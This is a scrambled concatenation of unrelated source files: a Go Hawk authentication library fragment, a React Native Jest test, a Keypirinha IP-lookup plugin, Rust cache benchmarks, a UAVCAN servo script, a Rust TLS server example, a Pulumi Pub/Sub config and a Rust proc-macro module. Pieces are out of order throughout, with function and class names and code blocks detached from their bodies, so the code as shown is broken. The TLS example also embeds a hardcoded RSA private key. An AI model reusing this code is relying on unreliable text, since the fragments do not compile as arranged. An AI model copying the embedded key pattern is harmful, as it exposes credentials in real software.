auth.RequestURI = "/" + strings.SplitN(auth.RequestURI[8:], "/", 2)[1] if auth.Valid() == nil { return nil } auth.RequestURI = uri } return ErrInvalidMAC } return nil } func abs(d time.Duration) time.Duration { if d < 0 { return -d } return d } // ValidResponse checks that a response Server-Authorization header is correct. // // ErrMissingServerAuth is returned if header is an empty string. ErrInvalidMAC // is returned if the MAC is not the expected value. func (auth *Auth) ValidResponse(header string) error { if header == "" { return ErrMissingServerAuth } err := auth.ParseHeader(header, AuthResponse) if err != nil { return err } if !hmac.Equal(auth.mac(AuthResponse), auth.MAC) { return ErrInvalidMAC } return nil } // PayloadHash initializes a hash for body validation. To validate a request or // response body, call PayloadHash with contentType set to the body Content-Type // with all parameters and prefix/suffix whitespace stripped, write the entire // body to the returned hash, and then validate the hash with ValidHash. func (auth *Auth) PayloadHash(contentType string) hash.Hash { h := auth.Credentials.Hash() h.Write([]byte("hawk." + headerVersion + ".payload\n" + contentType + "\n")) return h } // ValidHash writes the final newline to h and checks if it matches auth.Hash. func (auth *Auth) ValidHash(h hash.Hash) bool { h.Write([]byte("\n")) return hmac.Equal(h.Sum(nil), auth.Hash) } // SetHash writes the final newline to h and sets auth.Hash to the sum. This is // used to specify a response payload hash. func (auth *Auth) SetHash(h hash.Hash) { h.Write([]byte("\n")) auth.Hash = h.Sum(nil) auth.ReqHash = false } // ResponseHeader builds a response header based on the auth and provided ext, // which may be an empty string. Use PayloadHash and SetHash before // ResponseHeader to include a hash of the response payload. func (auth *Auth) ResponseHeader(ext string) string { auth.Ext = ext if auth.ReqHash { auth.Hash = nil } h := `Hawk mac="` + base64.StdEncoding.EncodeToString(auth.mac(AuthResponse)) + `"` if auth.Ext != "" { h += `, ext="` + auth.Ext + `"` } if auth.Hash != nil { h += `, hash="` + base64.StdEncoding.EncodeToString(auth.Hash) + `"` } return h } // RequestHeader builds a request header based on the auth. func (auth *Auth) RequestHeader() string { auth.MAC = auth.mac(AuthHeader) h := `Hawk id="` + auth.Credentials.ID + `", mac="` + base64.StdEncoding.EncodeToString(auth.MAC) + `", ts="` + strconv.FormatInt(auth.Timestamp.Unix(), 10) + `", nonce="` + auth.Nonce + `"` if len(auth.Hash) > 0 { h += `, hash="` + base64.StdEncoding.EncodeToString(auth.Hash) + `"` } if auth.Ext != "" { h += `, ext="` + auth.Ext + `"` } if auth.Credentials.App != "" { h += `, app="` + auth.Credentials.App + `"` } if auth.Credentials.Delegate != "" { h += `, dlg="` + auth.Credentials.Delegate + `"` } return h } // Bewit creates and encoded request bewit parameter based on the auth. func (auth *Auth) Bewit() string { auth.Method = "GET" auth.Nonce = "" return strings.TrimRight(base64.URLEncoding.EncodeToString([]byte(auth.Credentials.ID+`\`+ strconv.FormatInt(auth.Timestamp.Unix(), 10)+`\`+ base64.StdEncoding.EncodeToString(auth.mac(AuthBewit))+`\`+ auth.Ext)), "=") } // NormalizedString builds the string that will be HMACed to create a request // MAC. func (auth *Auth) NormalizedString(t AuthType) string { str := "hawk." + headerVersion + "." + t.String() + "\n" + strconv.FormatInt(auth.Timestamp.Unix(), 10) + "\n" + auth.Nonce + "\n" + auth.Method + "\n" + auth.RequestURI + "\n" + auth.Host + "\n" + auth.Port + "\n" + base64.StdEncoding.EncodeToString(auth.Hash) + "\n" + auth.Ext + "\n" if auth.Credentials.App != "" { str += auth.Credentials.App + "\n" str += auth.Credentials.Delegate + "\n" } return str } func (auth *Auth) mac(t AuthType) []byte { mac := auth.Credentials.MAC() mac.Write([]byte(auth.NormalizedString(t))) return mac.Sum(nil) } func (auth *Auth) tsMac(ts string) []byte { mac := auth.Credentials.MAC() mac.Write([]byte("hawk." + headerVersion + ".ts\n" + ts + "\n")) return mac.Sum(nil) } // StaleTimestampHeader builds a signed WWW-Authenticate response header for use // when Valid returns ErrTimestampSkew. func (auth *Auth) StaleTimestampHeader() string { ts := strconv.FormatInt(Now().Unix(), 10) return `Hawk ts="` + ts + `", tsm="` + base64.StdEncoding.EncodeToString(auth.tsMac(ts)) + `", error="Stale timestamp"` } var tsHeaderRegex = regexp.MustCompile(`(ts|tsm|error)="([ !#-\[\]-~]+)"`) // character class is ASCII printable [\x20-\x7E] without \ and " // UpdateOffset parses a signed WWW-Authenticate response header containing // a stale timestamp error and updates auth.Timestamp with an adjusted // timestamp. func (auth *Auth) UpdateOffset(header string) (time.Duration, error) { if len(header) < 4 || strings.ToLower(header[:4]) != "hawk" { return 0, AuthFormatError{"scheme", "must be Hawk"} } matches := tsHeaderRegex.FindAllStringSubmatch(header, 3) var err error var ts time.Time var tsm []byte for _, match := range matches { switch match[1] { case "ts": t, err := strconv.ParseInt(match[2], 10, 64) if err != nil { return 0, AuthFormatError{"ts", "not an integer"} } ts = time.Unix(t, 0) case "tsm": tsm, err = base64.StdEncoding.DecodeString(match[2]) if err != nil { return 0, AuthFormatError{"tsm", "malformed base64 encoding"} } } } if !hmac.Equal(tsm, auth.tsMac(strconv.FormatInt(ts.Unix(), 10))) { return 0, ErrInvalidMAC } offset := ts.Sub(Now()) auth.Timestamp = ts auth.Nonce = nonce() return offset, nil }
port = "80" }
index.test.tsx
import React from 'react' import { render, fireEvent } from '@testing-library/react-native' import Controls from '.' import { ILsChatMessage, ILsChatUser } from '../../../interfaces' import { delay } from '../../../utils' import { GestureResponderEvent } from 'react-native' let mockUser: ILsChatUser let mockUser2: ILsChatUser let mockMessage: ILsChatMessage let onPressControlBody: (event: GestureResponderEvent) => void let onDeleteControlButtonPress: (event: GestureResponderEvent) => void let onReplyControlButtonPress: (event: GestureResponderEvent) => void const ControlsA11yLabel = 'Selected Message Action Controls' const ReplyControlsA11yLabel = 'Reply Message Control Button' const DeleteControlsA11yLabel = 'Delete Message Control Button' describe('Controls tests', () => { beforeEach(() => { onPressControlBody = jest.fn() onDeleteControlButtonPress = jest.fn() onReplyControlButtonPress = jest.fn() mockUser = { id: '1', name: 'Test User', photo: 'https://avatars3.githubusercontent.com/u/5066378?s=400&u=98d81da11220a6d0f7f51532e2c3e949b50a445b&v=4', } mockUser2 = { id: '2', name: 'Test User 2', photo: 'https://avatars3.githubusercontent.com/u/5066378?s=400&u=98d81da11220a6d0f7f51532e2c3e949b50a445b&v=4', } mockMessage = { id: '1', text: 'Test Message', user: mockUser, time: new Date().getTime(), isDelivered: true, isRead: true, } }) it('Should Controls component render properly', () => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody}
onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const controls = queryByA11yLabel(ControlsA11yLabel) expect(controls).not.toBeNull() }) it('Should Controls component NOT render if prop "message" is null', () => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={null} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const controls = queryByA11yLabel(ControlsA11yLabel) expect(controls).toBeNull() }) it('Should Delete button NOT render if message user is NOT the same as the logged user', () => { const { queryByA11yLabel } = render( <Controls user={mockUser2} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel) expect(deleteButton).toBeNull() }) it('Should Delete button render if message user is the same as the logged user', () => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel) expect(deleteButton).not.toBeNull() }) it('Should Reply button NOT render if message prop "isDelivered" === false', () => { // Changing the status os the message to WAITING mockMessage.isDelivered = false mockMessage.isRead = false const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const replyButton = queryByA11yLabel(ReplyControlsA11yLabel) expect(replyButton).toBeNull() }) it('Should Reply button render if message prop "isDelivered" === true', () => { // Changing the status os the message to WAITING mockMessage.isDelivered = true mockMessage.isRead = false const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const replyButton = queryByA11yLabel(ReplyControlsA11yLabel) expect(replyButton).not.toBeNull() }) it('Should Reply button render if message prop "isRead" === true', () => { // Changing the status os the message to WAITING mockMessage.isDelivered = false mockMessage.isRead = true const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const replyButton = queryByA11yLabel(ReplyControlsA11yLabel) expect(replyButton).not.toBeNull() }) it('Should onPressControlBody be triggered properly if body overlay is pressed', async (done) => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const overlayButton = queryByA11yLabel(ControlsA11yLabel) fireEvent(overlayButton, 'onPress') await delay(500) expect(onPressControlBody).toBeCalledTimes(1) done() }) it('Should onDeleteControlButtonPress be triggered properly if delete button is pressed', () => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const deleteButton = queryByA11yLabel(DeleteControlsA11yLabel) fireEvent(deleteButton, 'onPress') expect(onDeleteControlButtonPress).toBeCalledTimes(1) }) it('Should onReplyControlButtonPress be triggered properly if delete button is pressed', () => { const { queryByA11yLabel } = render( <Controls user={mockUser} message={mockMessage} onPressControlBody={onPressControlBody} onDeleteControlButtonPress={onDeleteControlButtonPress} onReplyControlButtonPress={onReplyControlButtonPress} /> ) const replyButton = queryByA11yLabel(ReplyControlsA11yLabel) fireEvent(replyButton, 'onPress') expect(onReplyControlButtonPress).toBeCalledTimes(1) }) })
myip.py
# Keypirinha launcher (keypirinha.com) import socket import keypirinha as kp import keypirinha_net as kpnet import keypirinha_util as kpu class
(kp.Plugin): """ Get your public and local IP directly from Keypirinha. """ ITEM_CAT = kp.ItemCategory.USER_BASE + 1 KEYWORD = 'ip' def __init__(self): super().__init__() self._urlopener = kpnet.build_urllib_opener() def on_suggest(self, user_input, items_chain): if user_input.lower() == self.KEYWORD: public_ip = self._get_public_ip() local_ip = self._get_local_ip() self.set_catalog( [ self.create_item( category=kp.ItemCategory.KEYWORD, label='Your public IP', short_desc=public_ip, target='public_ip', args_hint=kp.ItemArgsHint.FORBIDDEN, hit_hint=kp.ItemHitHint.NOARGS ), self.create_item( category=kp.ItemCategory.KEYWORD, label='Your local IP', short_desc=local_ip, target='local_ip', args_hint=kp.ItemArgsHint.FORBIDDEN, hit_hint=kp.ItemHitHint.NOARGS ) ] ) def on_execute(self, item, action): kpu.set_clipboard(item.short_desc()) def on_events(self, flags): if flags & kp.Events.NETOPTIONS: self._urlopener = kpnet.build_urllib_opener() def _get_public_ip(self): try: with self._urlopener.open('http://icanhazip.com') as res: return res.read().decode('utf-8') except Exception as ex: self.err(ex) return 'Could not establish your public ip' def _get_local_ip(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except Exception as ex: self.err(ex) return 'Could not establish your local ip'
MyIP
benchmarks.rs
// This Source Code Form is subject to the terms of the Mozilla Public // License, v. 2.0. If a copy of the MPL was not distributed with this file, // You can obtain one at http://mozilla.org/MPL/2.0/. use async_std::task; use cacache; use criterion::{black_box, criterion_group, criterion_main, Criterion}; use tempfile; fn read_hash(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("read_hash", move |b| { b.iter(|| cacache::get::read_hash(black_box(&cache), black_box(&sri)).unwrap()) }); } fn read(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); cacache::put::data(&cache, "hello", data).unwrap(); cacache::get::read(&cache, "hello").unwrap(); c.bench_function("read", move |b| { b.iter(|| cacache::get::read(black_box(&cache), black_box(String::from("hello"))).unwrap()) }); } fn read_hash_big_data(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = vec![1; 1024 * 1024 * 5]; let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("read_hash_big_data", move |b| { b.iter(|| cacache::get::read_hash(black_box(&cache), black_box(&sri)).unwrap()) }); } fn async_read_hash(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read_hash", move |b| { b.iter(|| { task::block_on(cacache::async_get::read_hash( black_box(&cache), black_box(&sri), )) .unwrap() }) }); } fn async_read(c: &mut Criterion) { let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = b"hello world".to_vec(); cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read", move |b| { b.iter(|| { task::block_on(cacache::async_get::read( black_box(&cache), black_box("hello"), )) .unwrap() }) }); } fn async_read_hash_big_data(c: &mut Criterion)
criterion_group!( benches, read_hash, read, async_read_hash, async_read, read_hash_big_data, async_read_hash_big_data, ); criterion_main!(benches);
{ let tmp = tempfile::tempdir().unwrap(); let cache = tmp.path().to_owned(); let data = vec![1; 1024 * 1024 * 5]; let sri = cacache::put::data(&cache, "hello", data).unwrap(); c.bench_function("async_read_hash_big_data", move |b| { b.iter(|| { task::block_on(cacache::async_get::read_hash( black_box(&cache), black_box(&sri), )) .unwrap() }) }); }
set_servo.py
#!/usr/bin/env python3 """ Sends a PWM via UAVCAN """ import argparse import uavcan import os DSDL_DIR = os.path.join(os.path.dirname(__file__), "../uavcan_data_types/cvra") def parse_args(): parser = argparse.ArgumentParser(description=__doc__) parser.add_argument( "port", help="SocketCAN interface (e.g. can0) or SLCAN serial port (e.g. /dev/ttyACM0)", ) parser.add_argument("id", help="ID of the board to target", type=int) parser.add_argument("servo", help="Servo output to be controlled", type=int) parser.add_argument( "pos", help="Desired duty cycle on the servo output", type=float ) parser.add_argument( "vel", help="Desired duty cycle rate of change", nargs="?", default=0, type=float, ) parser.add_argument( "acc", help="Desired duty cycle rate of rate of change", nargs="?", default=0, type=float, ) return parser.parse_args() def set_servo(node, dst_id, values): msg = uavcan.thirdparty.cvra.io.ServoPWM( node_id=dst_id, servo_pos=values["pos"], servo_vel=values["vel"], servo_acc=values["acc"], ) node.broadcast(msg, priority=uavcan.TRANSFER_PRIORITY_HIGHEST) def
(servo, pos, vel, acc): setpoint = { "pos": [0, 0, 0, 0], "vel": [0, 0, 0, 0], "acc": [0, 0, 0, 0], } setpoint["pos"][servo] = pos setpoint["vel"][servo] = vel setpoint["acc"][servo] = acc return setpoint def main(): args = parse_args() node = uavcan.make_node(args.port, node_id=42) uavcan.load_dsdl(DSDL_DIR) set_servo(node, args.id, servo_setpoint(args.servo, args.pos, args.vel, args.acc)) # Spin node for 1 second node.spin(1) node.close() if __name__ == "__main__": main()
servo_setpoint
main.rs
use poem::{ get, handler, listener::{Listener, RustlsConfig, TcpListener}, Route, Server, }; const CERT: &str = r#" -----BEGIN CERTIFICATE----- MIIEADCCAmigAwIBAgICAcgwDQYJKoZIhvcNAQELBQAwLDEqMCgGA1UEAwwhcG9u eXRvd24gUlNBIGxldmVsIDIgaW50ZXJtZWRpYXRlMB4XDTE2MDgxMzE2MDcwNFoX DTIyMDIwMzE2MDcwNFowGTEXMBUGA1UEAwwOdGVzdHNlcnZlci5jb20wggEiMA0G CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCpVhh1/FNP2qvWenbZSghari/UThwe dynfnHG7gc3JmygkEdErWBO/CHzHgsx7biVE5b8sZYNEDKFojyoPHGWK2bQM/FTy niJCgNCLdn6hUqqxLAml3cxGW77hAWu94THDGB1qFe+eFiAUnDmob8gNZtAzT6Ky b/JGJdrEU0wj+Rd7wUb4kpLInNH/Jc+oz2ii2AjNbGOZXnRz7h7Kv3sO9vABByYe LcCj3qnhejHMqVhbAT1MD6zQ2+YKBjE52MsQKU/xhUpu9KkUyLh0cxkh3zrFiKh4 Vuvtc+n7aeOv2jJmOl1dr0XLlSHBlmoKqH6dCTSbddQLmlK7dms8vE01AgMBAAGj gb4wgbswDAYDVR0TAQH/BAIwADALBgNVHQ8EBAMCBsAwHQYDVR0OBBYEFMeUzGYV bXwJNQVbY1+A8YXYZY8pMEIGA1UdIwQ7MDmAFJvEsUi7+D8vp8xcWvnEdVBGkpoW oR6kHDAaMRgwFgYDVQQDDA9wb255dG93biBSU0EgQ0GCAXswOwYDVR0RBDQwMoIO dGVzdHNlcnZlci5jb22CFXNlY29uZC50ZXN0c2VydmVyLmNvbYIJbG9jYWxob3N0 MA0GCSqGSIb3DQEBCwUAA4IBgQBsk5ivAaRAcNgjc7LEiWXFkMg703AqDDNx7kB1 RDgLalLvrjOfOp2jsDfST7N1tKLBSQ9bMw9X4Jve+j7XXRUthcwuoYTeeo+Cy0/T 1Q78ctoX74E2nB958zwmtRykGrgE/6JAJDwGcgpY9kBPycGxTlCN926uGxHsDwVs 98cL6ZXptMLTR6T2XP36dAJZuOICSqmCSbFR8knc/gjUO36rXTxhwci8iDbmEVaf BHpgBXGU5+SQ+QM++v6bHGf4LNQC5NZ4e4xvGax8ioYu/BRsB/T3Lx+RlItz4zdU XuxCNcm3nhQV2ZHquRdbSdoyIxV5kJXel4wCmOhWIq7A2OBKdu5fQzIAzzLi65EN RPAKsKB4h7hGgvciZQ7dsMrlGw0DLdJ6UrFyiR5Io7dXYT/+JP91lP5xsl6Lhg9O FgALt7GSYRm2cZdgi9pO9rRr83Br1VjQT1vHz6yoZMXSqc4A2zcN2a2ZVq//rHvc FZygs8miAhWPzqnpmgTj1cPiU1M= -----END CERTIFICATE----- "#; const KEY: &str = r#" -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAqVYYdfxTT9qr1np22UoIWq4v1E4cHncp35xxu4HNyZsoJBHR K1gTvwh8x4LMe24lROW/LGWDRAyhaI8qDxxlitm0DPxU8p4iQoDQi3Z+oVKqsSwJ pd3MRlu+4QFrveExwxgdahXvnhYgFJw5qG/IDWbQM0+ism/yRiXaxFNMI/kXe8FG +JKSyJzR/yXPqM9ootgIzWxjmV50c+4eyr97DvbwAQcmHi3Ao96p4XoxzKlYWwE9 TA+s0NvmCgYxOdjLEClP8YVKbvSpFMi4dHMZId86xYioeFbr7XPp+2njr9oyZjpd Xa9Fy5UhwZZqCqh+nQk0m3XUC5pSu3ZrPLxNNQIDAQABAoIBAFKtZJgGsK6md4vq kyiYSufrcBLaaEQ/rkQtYCJKyC0NAlZKFLRy9oEpJbNLm4cQSkYPXn3Qunx5Jj2k 2MYz+SgIDy7f7KHgr52Ew020dzNQ52JFvBgt6NTZaqL1TKOS1fcJSSNIvouTBerK NCSXHzfb4P+MfEVe/w1c4ilE+kH9SzdEo2jK/sRbzHIY8TX0JbmQ4SCLLayr22YG usIxtIYcWt3MMP/G2luRnYzzBCje5MXdpAhlHLi4TB6x4h5PmBKYc57uOVNngKLd YyrQKcszW4Nx5v0a4HG3A5EtUXNCco1+5asXOg2lYphQYVh2R+1wgu5WiDjDVu+6 EYgjFSkCgYEA0NBk6FDoxE/4L/4iJ4zIhu9BptN8Je/uS5c6wRejNC/VqQyw7SHb hRFNrXPvq5Y+2bI/DxtdzZLKAMXOMjDjj0XEgfOIn2aveOo3uE7zf1i+njxwQhPu uSYA9AlBZiKGr2PCYSDPnViHOspVJjxRuAgyWM1Qf+CTC0D95aj0oz8CgYEAz5n4 Cb3/WfUHxMJLljJ7PlVmlQpF5Hk3AOR9+vtqTtdxRjuxW6DH2uAHBDdC3OgppUN4 CFj55kzc2HUuiHtmPtx8mK6G+otT7Lww+nLSFL4PvZ6CYxqcio5MPnoYd+pCxrXY JFo2W7e4FkBOxb5PF5So5plg+d0z/QiA7aFP1osCgYEAtgi1rwC5qkm8prn4tFm6 hkcVCIXc+IWNS0Bu693bXKdGr7RsmIynff1zpf4ntYGpEMaeymClCY0ppDrMYlzU RBYiFNdlBvDRj6s/H+FTzHRk2DT/99rAhY9nzVY0OQFoQIXK8jlURGrkmI/CYy66 XqBmo5t4zcHM7kaeEBOWEKkCgYAYnO6VaRtPNQfYwhhoFFAcUc+5t+AVeHGW/4AY M5qlAlIBu64JaQSI5KqwS0T4H+ZgG6Gti68FKPO+DhaYQ9kZdtam23pRVhd7J8y+ xMI3h1kiaBqZWVxZ6QkNFzizbui/2mtn0/JB6YQ/zxwHwcpqx0tHG8Qtm5ZAV7PB eLCYhQKBgQDALJxU/6hMTdytEU5CLOBSMby45YD/RrfQrl2gl/vA0etPrto4RkVq UrkDO/9W4mZORClN3knxEFSTlYi8YOboxdlynpFfhcs82wFChs+Ydp1eEsVHAqtu T+uzn0sroycBiBfVB949LExnzGDFUkhG0i2c2InarQYLTsIyHCIDEA== -----END RSA PRIVATE KEY----- "#; #[handler] fn index() -> &'static str { "hello world" } #[tokio::main] async fn
() -> Result<(), std::io::Error> { if std::env::var_os("RUST_LOG").is_none() { std::env::set_var("RUST_LOG", "poem=debug"); } tracing_subscriber::fmt::init(); let app = Route::new().at("/", get(index)); let listener = TcpListener::bind("127.0.0.1:3000").rustls(RustlsConfig::new().key(KEY).cert(CERT)); Server::new(listener).run(app).await }
main
pubsub.ts
import * as gcp from "@pulumi/gcp" const furniDataTopic = new gcp.pubsub.Topic("furni-data-topic") const furniDataDeadLetterTopic = new gcp.pubsub.Topic("furni-data-dead-letter-topic") new gcp.pubsub.Subscription("furni-data-dead-letter-subscription", {
} }) export { furniDataTopic }
topic: furniDataTopic.name, deadLetterPolicy: { deadLetterTopic: furniDataDeadLetterTopic.id, maxDeliveryAttempts: 15
proc_macro_input.rs
use crate::input::{Input, InputMatch, Range}; use crate::proc_macro::{flatten, FlatToken, FlatTokenPat, Span, TokenStream}; use indexing::{proof::Provable, Container, Index, Unknown}; use std::ops; impl Input for TokenStream { type Container = Vec<FlatToken>; type Slice = [FlatToken]; type SourceInfo = ops::Range<Span>; type SourceInfoPoint = Span; fn to_container(self) -> Self::Container { let mut out = vec![]; flatten(self, &mut out); out } fn slice<'b, 'i>( input: &'b Container<'i, Self::Container>, range: Range<'i>, ) -> &'b Self::Slice { &input[range.0] } fn source_info<'i>( input: &Container<'i, Self::Container>, range: Range<'i>, ) -> Self::SourceInfo
fn source_info_point<'i>( input: &Container<'i, Self::Container>, index: Index<'i, Unknown>, ) -> Self::SourceInfoPoint { // Try to get as much information as possible. let (before, after) = input.split_at(index); let before = &input[before]; let after = &input[after]; if let Some(first) = after.first() { first.span() } else if let Some(last) = before.last() { // Not correct but we're at the end of the input anyway. last.span() } else { // HACK(eddyb) last resort, make a span up // (a better option should exist) Span::call_site() } } } impl InputMatch<[FlatTokenPat<&'_ str>]> for [FlatToken] { fn match_left(&self, pat: &[FlatTokenPat<&str>]) -> Option<usize> { if self .iter() .zip(pat) .take_while(|(t, p)| t.matches_pat(p)) .count() == pat.len() { Some(pat.len()) } else { None } } fn match_right(&self, pat: &[FlatTokenPat<&str>]) -> Option<usize> { if self .iter() .zip(pat) .rev() .take_while(|(t, p)| t.matches_pat(p)) .count() == pat.len() { Some(pat.len()) } else { None } } }
{ // FIXME(eddyb) should be joining up spans, but the API // for that is still "semver-exempt" in `proc-macro2`. let last = range .nonempty() .map(|r| r.last().no_proof()) .unwrap_or(range.past_the_end()); Self::source_info_point(input, range.first())..Self::source_info_point(input, last) }